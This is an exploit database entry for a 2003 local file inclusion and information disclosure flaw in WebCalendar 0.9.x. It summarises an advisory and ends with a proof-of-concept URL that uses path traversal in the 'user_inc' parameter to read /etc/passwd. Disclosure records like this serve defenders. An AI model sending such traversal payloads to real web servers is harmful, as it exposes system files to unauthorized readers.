WebCalendar 0.9.x - Local File Inclusion Information Disclosure

EDB-ID:

22942

CVE:





Platform:

PHP

Date:

2003-07-21


source: https://www.securityfocus.com/bid/8237/info

It has been reported that an information disclosure issue exists in WebCalendar. This may allow an attacker to gain unauthorized read access to potentially sensitive information with the privileges of the web server process.

http://www.example.com/webcalendar/[filename].php?user_inc=../../../../../etc/passwd